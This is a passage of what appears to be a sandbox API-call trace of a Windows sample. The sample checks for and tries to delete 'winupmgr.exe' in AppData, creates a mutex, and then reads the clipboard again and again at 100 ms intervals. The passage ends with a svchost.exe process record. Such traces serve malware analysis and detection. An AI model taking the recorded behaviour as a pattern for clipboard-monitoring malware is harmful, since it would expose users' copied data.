Locale=0x409, LCType=0x35, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Fri") returned 4 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Friday") returned 7 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Sat") returned 4 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Saturday") returned 9 [0103.237] GetThreadLocale () returned 0x409 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="$") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fec4, cchData=2 | out: lpLCData=",") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fec4, cchData=2 | out: lpLCData=".") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="2") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fec4, cchData=2 | out: lpLCData="/") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0103.237] GetThreadLocale () returned 0x409 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd98, cchData=256 | out: lpLCData="1") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0103.237] GetThreadLocale () returned 0x409 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd98, cchData=256 | out: lpLCData="1") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fec4, cchData=2 | out: lpLCData=":") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="AM") returned 3 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="PM") returned 3 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fec4, cchData=2 | out: lpLCData=",") returned 2 [0103.238] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76e40000 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VariantChangeTypeEx") returned 0x76e44c28 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarNeg") returned 0x76ebc802 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarNot") returned 0x76ebec66 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarAdd") returned 0x76e65934 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarSub") returned 0x76ebd332 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarMul") returned 0x76ebdbd4 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarDiv") returned 0x76ebe405 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarIdiv") returned 0x76ebf00a [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarMod") returned 0x76ebf15e [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarAnd") returned 0x76e65a98 [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarOr") returned 0x76ebecfa [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarXor") returned 0x76ebee2e [0103.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarCmp") returned 0x76e5b0dc [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarI4FromStr") returned 0x76e56fab [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarR4FromStr") returned 0x76e601a0 [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarR8FromStr") returned 0x76e5699e [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarDateFromStr") returned 0x76e66ba7 [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarCyFromStr") returned 0x76e86c12 [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarBoolFromStr") returned 0x76e5dbd1 [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromCy") returned 0x76e67fdc [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromDate") returned 0x76e57a2a [0103.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromBool") returned 0x76e60355 [0103.239] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x94 [0103.239] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x98 [0103.239] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9c [0103.239] GetDC (hWnd=0x0) returned 0x4010a8b [0103.240] GetDeviceCaps (hdc=0x4010a8b, index=90) returned 96 [0103.240] ReleaseDC (hWnd=0x0, hDC=0x4010a8b) returned 1 [0103.240] GetDC (hWnd=0x0) returned 0x4010a8b [0103.240] GetDeviceCaps (hdc=0x4010a8b, index=104) returned 0 [0103.240] ReleaseDC (hWnd=0x0, hDC=0x4010a8b) returned 1 [0103.240] CreatePalette (plpal=0x18fb28) returned 0x3a0809e5 [0103.240] GetStockObject (i=7) returned 0x1b00017 [0103.240] GetStockObject (i=5) returned 0x1900015 [0103.240] GetStockObject (i=13) returned 0x18a002e [0103.240] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0103.240] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0103.240] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x2e [0103.240] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x1c80ba4, nSize=0x2e | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0103.240] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe", lpFindFileData=0x18fde8 | out: lpFindFileData=0x18fde8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfbd4d440, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfbd4d440, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfb9e14a0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xae00, dwReserved0=0x76c32e63, dwReserved1=0x2, cFileName="winupmgr.exe", cAlternateFileName="")) returned 0x605500 [0103.241] FindClose (in: hFindFile=0x605500 | out: hFindFile=0x605500) returned 1 [0103.241] FileTimeToLocalFileTime (in: lpFileTime=0x18fdfc, lpLocalFileTime=0x18ff28 | out: lpLocalFileTime=0x18ff28) returned 1 [0103.241] FileTimeToDosDateTime (in: lpFileTime=0x18ff28, lpFatDate=0x18ff32, lpFatTime=0x18ff30 | out: lpFatDate=0x18ff32, lpFatTime=0x18ff30) returned 1 [0103.241] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe", lpFindFileData=0x18fde8 | out: lpFindFileData=0x18fde8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfbd4d440, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfbd4d440, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfb9e14a0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xae00, dwReserved0=0x76c32e63, dwReserved1=0x2, cFileName="winupmgr.exe", cAlternateFileName="")) returned 0x605500 [0103.241] FindClose (in: hFindFile=0x605500 | out: hFindFile=0x605500) returned 1 [0103.241] FileTimeToLocalFileTime (in: lpFileTime=0x18fdfc, lpLocalFileTime=0x18ff28 | out: lpLocalFileTime=0x18ff28) returned 1 [0103.241] FileTimeToDosDateTime (in: lpFileTime=0x18ff28, lpFatDate=0x18ff32, lpFatTime=0x18ff30 | out: lpFatDate=0x18ff32, lpFatTime=0x18ff30) returned 1 [0103.241] DeleteFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\winupmgr.exe")) returned 0 [0103.242] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="^X@%E5~PB,23-A@M_B!P9O<>T/+=") returned 0xa0 [0103.242] GetLastError () returned 0x0 [0103.242] GetOpenClipboardWindow () returned 0x0 [0103.242] OpenClipboard (hWndNewOwner=0x0) returned 1 [0103.242] GetClipboardData (uFormat=0x1) returned 0x605520 [0103.243] GlobalSize (hMem=0x605520) returned 0x21 [0103.243] GlobalLock (hMem=0x605520) returned 0x605520 [0103.243] GlobalUnlock (hMem=0x605520) returned 1 [0103.243] CloseClipboard () returned 1 [0103.243] Sleep (dwMilliseconds=0x64) [0103.435] GetOpenClipboardWindow () returned 0x0 [0103.435] OpenClipboard (hWndNewOwner=0x0) returned 1 [0103.435] GetClipboardData (uFormat=0x1) returned 0x605520 [0103.436] GlobalSize (hMem=0x605520) returned 0x21 [0103.436] GlobalLock (hMem=0x605520) returned 0x605520 [0103.436] GlobalUnlock (hMem=0x605520) returned 1 [0103.436] CloseClipboard () returned 1 [0103.436] Sleep (dwMilliseconds=0x64) [0103.639] GetOpenClipboardWindow () returned 0x0 [0103.639] OpenClipboard (hWndNewOwner=0x0) returned 1 [0103.639] GetClipboardData (uFormat=0x1) returned 0x605520 [0103.639] GlobalSize (hMem=0x605520) returned 0x21 [0103.639] GlobalLock (hMem=0x605520) returned 0x605520 [0103.639] GlobalUnlock (hMem=0x605520) returned 1 [0103.639] CloseClipboard () returned 1 [0103.639] Sleep (dwMilliseconds=0x64) [0103.919] GetOpenClipboardWindow () returned 0x0 [0103.919] OpenClipboard (hWndNewOwner=0x0) returned 1 [0103.919] GetClipboardData (uFormat=0x1) returned 0x605520 [0103.920] GlobalSize (hMem=0x605520) returned 0x21 [0103.920] GlobalLock (hMem=0x605520) returned 0x605520 [0103.920] GlobalUnlock (hMem=0x605520) returned 1 [0103.920] CloseClipboard () returned 1 [0103.920] Sleep (dwMilliseconds=0x64) [0104.091] GetOpenClipboardWindow () returned 0x0 [0104.091] OpenClipboard (hWndNewOwner=0x0) returned 1 [0104.091] GetClipboardData (uFormat=0x1) returned 0x605520 [0104.092] GlobalSize (hMem=0x605520) returned 0x21 [0104.092] GlobalLock (hMem=0x605520) returned 0x605520 [0104.092] GlobalUnlock (hMem=0x605520) returned 1 [0104.092] CloseClipboard () returned 1 [0104.092] Sleep (dwMilliseconds=0x64) [0104.263] GetOpenClipboardWindow () returned 0x0 [0104.263] OpenClipboard (hWndNewOwner=0x0) returned 1 [0104.263] GetClipboardData (uFormat=0x1) returned 0x605520 [0104.263] GlobalSize (hMem=0x605520) returned 0x21 [0104.263] GlobalLock (hMem=0x605520) returned 0x605520 [0104.263] GlobalUnlock (hMem=0x605520) returned 1 [0104.263] CloseClipboard () returned 1 [0104.263] Sleep (dwMilliseconds=0x64) [0104.918] GetOpenClipboardWindow () returned 0x0 [0104.918] OpenClipboard (hWndNewOwner=0x0) returned 1 [0104.918] GetClipboardData (uFormat=0x1) returned 0x605520 [0104.918] GlobalSize (hMem=0x605520) returned 0x21 [0104.918] GlobalLock (hMem=0x605520) returned 0x605520 [0104.918] GlobalUnlock (hMem=0x605520) returned 1 [0104.918] CloseClipboard () returned 1 [0104.918] Sleep (dwMilliseconds=0x64) [0105.121] GetOpenClipboardWindow () returned 0x0 [0105.121] OpenClipboard (hWndNewOwner=0x0) returned 1 [0105.121] GetClipboardData (uFormat=0x1) returned 0x605520 [0105.121] GlobalSize (hMem=0x605520) returned 0x21 [0105.121] GlobalLock (hMem=0x605520) returned 0x605520 [0105.121] GlobalUnlock (hMem=0x605520) returned 1 [0105.121] CloseClipboard () returned 1 [0105.121] Sleep (dwMilliseconds=0x64) [0105.296] GetOpenClipboardWindow () returned 0x0 [0105.296] OpenClipboard (hWndNewOwner=0x0) returned 1 [0105.296] GetClipboardData (uFormat=0x1) returned 0x605520 [0105.296] GlobalSize (hMem=0x605520) returned 0x21 [0105.296] GlobalLock (hMem=0x605520) returned 0x605520 [0105.296] GlobalUnlock (hMem=0x605520) returned 1 [0105.296] CloseClipboard () returned 1 [0105.296] Sleep (dwMilliseconds=0x64) [0108.468] GetOpenClipboardWindow () returned 0x0 [0108.468] OpenClipboard (hWndNewOwner=0x0) returned 1 [0108.469] GetClipboardData (uFormat=0x1) returned 0x605520 [0108.469] GlobalSize (hMem=0x605520) returned 0x21 [0108.469] GlobalLock (hMem=0x605520) returned 0x605520 [0108.469] GlobalUnlock (hMem=0x605520) returned 1 [0108.469] CloseClipboard () returned 1 [0108.469] Sleep (dwMilliseconds=0x64) [0108.664] GetOpenClipboardWindow () returned 0x0 [0108.664] OpenClipboard (hWndNewOwner=0x0) returned 1 [0108.664] GetClipboardData (uFormat=0x1) returned 0x605520 [0108.664] GlobalSize (hMem=0x605520) returned 0x21 [0108.665] GlobalLock (hMem=0x605520) returned 0x605520 [0108.665] GlobalUnlock (hMem=0x605520) returned 1 [0108.665] CloseClipboard () returned 1 [0108.665] Sleep (dwMilliseconds=0x64) [0108.896] GetOpenClipboardWindow () returned 0x0 [0108.896] OpenClipboard (hWndNewOwner=0x0) returned 1 [0108.896] GetClipboardData (uFormat=0x1) returned 0x605520 [0108.896] GlobalSize (hMem=0x605520) returned 0x21 [0108.896] GlobalLock (hMem=0x605520) returned 0x605520 [0108.896] GlobalUnlock (hMem=0x605520) returned 1 [0108.896] CloseClipboard () returned 1 [0108.896] Sleep (dwMilliseconds=0x64) [0109.098] GetOpenClipboardWindow () returned 0x0 [0109.098] OpenClipboard (hWndNewOwner=0x0) returned 1 [0109.098] GetClipboardData (uFormat=0x1) returned 0x605520 [0109.098] GlobalSize (hMem=0x605520) returned 0x21 [0109.098] GlobalLock (hMem=0x605520) returned 0x605520 [0109.098] GlobalUnlock (hMem=0x605520) returned 1 [0109.098] CloseClipboard () returned 1 [0109.099] Sleep (dwMilliseconds=0x64) [0109.218] GetOpenClipboardWindow () returned 0x0 [0109.218] OpenClipboard (hWndNewOwner=0x0) returned 1 [0109.218] GetClipboardData (uFormat=0x1) returned 0x605520 [0109.218] GlobalSize (hMem=0x605520) returned 0x21 [0109.218] GlobalLock (hMem=0x605520) returned 0x605520 [0109.218] GlobalUnlock (hMem=0x605520) returned 1 [0109.218] CloseClipboard () returned 1 [0109.218] Sleep (dwMilliseconds=0x64) [0109.374] GetOpenClipboardWindow () returned 0x0 [0109.374] OpenClipboard (hWndNewOwner=0x0) returned 1 [0109.374] GetClipboardData (uFormat=0x1) returned 0x605520 [0109.374] GlobalSize (hMem=0x605520) returned 0x21 [0109.374] GlobalLock (hMem=0x605520) returned 0x605520 [0109.374] GlobalUnlock (hMem=0x605520) returned 1 [0109.374] CloseClipboard () returned 1 [0109.374] Sleep (dwMilliseconds=0x64) [0110.202] GetOpenClipboardWindow () returned 0x0 [0110.202] OpenClipboard (hWndNewOwner=0x0) returned 1 [0110.202] GetClipboardData (uFormat=0x1) returned 0x605520 [0110.202] GlobalSize (hMem=0x605520) returned 0x21 [0110.202] GlobalLock (hMem=0x605520) returned 0x605520 [0110.202] GlobalUnlock (hMem=0x605520) returned 1 [0110.202] CloseClipboard () returned 1 [0110.202] Sleep (dwMilliseconds=0x64) [0110.359] GetOpenClipboardWindow () returned 0x0 [0110.359] OpenClipboard (hWndNewOwner=0x0) returned 1 [0110.360] GetClipboardData (uFormat=0x1) returned 0x605520 [0110.362] GlobalSize (hMem=0x605520) returned 0x21 [0110.362] GlobalLock (hMem=0x605520) returned 0x605520 [0110.362] GlobalUnlock (hMem=0x605520) returned 1 [0110.362] CloseClipboard () returned 1 [0110.362] Sleep (dwMilliseconds=0x64) [0110.502] GetOpenClipboardWindow () returned 0x0 [0110.502] OpenClipboard (hWndNewOwner=0x0) returned 1 [0110.502] GetClipboardData (uFormat=0x1) returned 0x605520 [0110.502] GlobalSize (hMem=0x605520) returned 0x21 [0110.502] GlobalLock (hMem=0x605520) returned 0x605520 [0110.502] GlobalUnlock (hMem=0x605520) returned 1 [0110.503] CloseClipboard () returned 1 [0110.503] Sleep (dwMilliseconds=0x64) [0110.986] GetOpenClipboardWindow () returned 0x0 [0110.986] OpenClipboard (hWndNewOwner=0x0) returned 1 [0110.986] GetClipboardData (uFormat=0x1) returned 0x605520 [0110.986] GlobalSize (hMem=0x605520) returned 0x21 [0110.986] GlobalLock (hMem=0x605520) returned 0x605520 [0110.986] GlobalUnlock (hMem=0x605520) returned 1 [0110.986] CloseClipboard () returned 1 [0110.986] Sleep (dwMilliseconds=0x64) [0111.126] GetOpenClipboardWindow () returned 0x0 [0111.127] OpenClipboard (hWndNewOwner=0x0) returned 1 [0111.127] GetClipboardData (uFormat=0x1) returned 0x605520 [0111.127] GlobalSize (hMem=0x605520) returned 0x21 [0111.127] GlobalLock (hMem=0x605520) returned 0x605520 [0111.127] GlobalUnlock (hMem=0x605520) returned 1 [0111.127] CloseClipboard () returned 1 [0111.127] Sleep (dwMilliseconds=0x64) [0111.252] GetOpenClipboardWindow () returned 0x0 [0111.252] OpenClipboard (hWndNewOwner=0x0) returned 1 [0111.252] GetClipboardData (uFormat=0x1) returned 0x605520 [0111.252] GlobalSize (hMem=0x605520) returned 0x21 [0111.252] GlobalLock (hMem=0x605520) returned 0x605520 [0111.252] GlobalUnlock (hMem=0x605520) returned 1 [0111.252] CloseClipboard () returned 1 [0111.252] Sleep (dwMilliseconds=0x64) [0111.508] GetOpenClipboardWindow () returned 0x0 [0111.509] OpenClipboard (hWndNewOwner=0x0) returned 1 [0111.509] GetClipboardData (uFormat=0x1) returned 0x605520 [0111.509] GlobalSize (hMem=0x605520) returned 0x21 [0111.509] GlobalLock (hMem=0x605520) returned 0x605520 [0111.509] GlobalUnlock (hMem=0x605520) returned 1 [0111.509] CloseClipboard () returned 1 [0111.509] Sleep (dwMilliseconds=0x64) [0112.072] GetOpenClipboardWindow () returned 0x0 [0112.072] OpenClipboard (hWndNewOwner=0x0) returned 1 [0112.072] GetClipboardData (uFormat=0x1) returned 0x605520 [0112.072] GlobalSize (hMem=0x605520) returned 0x21 [0112.072] GlobalLock (hMem=0x605520) returned 0x605520 [0112.072] GlobalUnlock (hMem=0x605520) returned 1 [0112.072] CloseClipboard () returned 1 [0112.073] Sleep (dwMilliseconds=0x64) [0112.185] GetOpenClipboardWindow () returned 0x0 [0112.185] OpenClipboard (hWndNewOwner=0x0) returned 1 [0112.185] GetClipboardData (uFormat=0x1) returned 0x605520 [0112.187] GlobalSize (hMem=0x605520) returned 0x21 [0112.187] GlobalLock (hMem=0x605520) returned 0x605520 [0112.187] GlobalUnlock (hMem=0x605520) returned 1 [0112.187] CloseClipboard () returned 1 [0112.187] Sleep (dwMilliseconds=0x64) Process: id = "19" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "15" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 69 os_tid = 0x8cc Thread: id = 70 os_tid = 0x8bc Thread: id = 71 os_tid = 0x88c Thread: id = 72 os_tid = 0x87c Thread: id = 73 os_tid = 0x320 Thread: id = 74 os_tid = 0x6cc Thread: id = 75 os_tid = 0x42c Thread: id = 76 os_tid = 0x1e4 Thread: id = 77 os_tid = 0x760 Thread: id = 78 os_tid = 0x75c Thread: id = 79 os_tid = 0x74c Thread: id = 80 os_tid = 0x710 Thread: id = 81 os_tid = 0x6d0 Thread: id = 82 os_tid = 0x6bc Thread: id = 83 os_tid = 0x6b8 Thread: id = 84 os_tid = 0x6b0 Thread: id = 85 os_tid = 0x6a8 Thread: id = 86 os_tid = 0x69c Thread: id = 87 os_tid = 0x698 Thread: id = 88 os_tid = 0x684 Thread: id = 89 os_tid = 0x678 Thread: id = 90 os_tid = 0x4a8 Thread: id = 91 os_tid = 0x46c Thread: id = 92 os_tid = 0x44c Thread: id = 93 os_tid = 0x424 Thread: id = 94 os_tid = 0x420 Thread: id = 95 os_tid = 0x41c Thread: id = 96 os_tid = 0x404 Thread: id = 97 os_tid = 0x14c Thread: id = 98 os_tid = 0x158 Thread: id = 99 os_tid = 0x3fc Thread: id = 100 os_tid = 0x3f4 Thread: id = 101 os_tid = 0x3e8 Thread: id = 102 os_tid = 0x39c Thread: id = 103 os_tid = 0x390 Thread: id = 104 os_tid = 0x38c Thread: id = 105 os_tid = 0x388 Thread: id = 106 os_tid = 0x37c Thread: id = 107 os_tid = 0x374